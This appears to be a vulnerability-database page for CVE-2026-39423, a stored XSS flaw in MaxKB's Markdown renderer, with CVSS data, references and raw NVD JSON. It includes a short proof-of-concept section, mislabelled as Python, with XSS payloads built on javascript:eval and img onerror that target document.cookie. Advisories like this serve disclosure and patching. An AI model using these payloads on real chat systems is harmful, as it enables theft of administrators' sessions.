CVE-2026-39423

Description

MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain an Eval Injection vulnerability in the Markdown rendering engine that allows any user capable of interacting with the AI chat interface to execute arbitrary JavaScript in the browsers of other users, including administrators, resulting in Stored Cross-Site Scripting (XSS). This issue has been fixed in version 2.8.0.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:* - VULNERABLE

MaxKB <= 2.7.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/**
 * PoC for CVE-2026-39423 (MaxKB Eval Injection -> Stored XSS)
 * 
 * Description:
 * This payload demonstrates how a malicious user can inject JavaScript
 * via the chat interface. The Markdown renderer interprets the input
 * in a way that triggers an eval(), leading to Stored XSS.
 * 
 * Usage:
 * Send the following payload in the MaxKB chat interface.
 * When an admin views the conversation, the alert will trigger.
 */

// Payload to be sent in the chat message
// Attempting to trigger eval injection through markdown parsing
var payload = "[xss](javascript:eval('alert(document.cookie)'))";

// Alternatively, if the markdown engine allows script tags or event handlers
// var payload = "<img src=x onerror=eval('alert(1)')>";

// Log for demonstration
console.log("Send this string in the chat: " + payload);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39423
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39423
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39423/
[4] VulDB https://vuldb.com/cve/CVE-2026-39423
[5] https://github.com/1Panel-dev/MaxKB/commit/34fb95bde9574c5b3a734ab00c7f29b9e7d32669
[6] https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0
[7] https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-462x-99gf-mp79

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39423", "sourceIdentifier": "[email protected]", "published": "2026-04-14T01:16:05.000", "lastModified": "2026-04-20T17:34:28.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain an Eval Injection vulnerability in the Markdown rendering engine that allows any user capable of interacting with the AI chat interface to execute arbitrary JavaScript in the browsers of other users, including administrators, resulting in Stored Cross-Site Scripting (XSS). This issue has been fixed in version 2.8.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-95"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.8.0", "matchCriteriaId": "8BB376B6-4E9C-4801-9D33-5BF858C857D2"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/MaxKB/commit/34fb95bde9574c5b3a734ab00c7f29b9e7d32669", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-462x-99gf-mp79", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}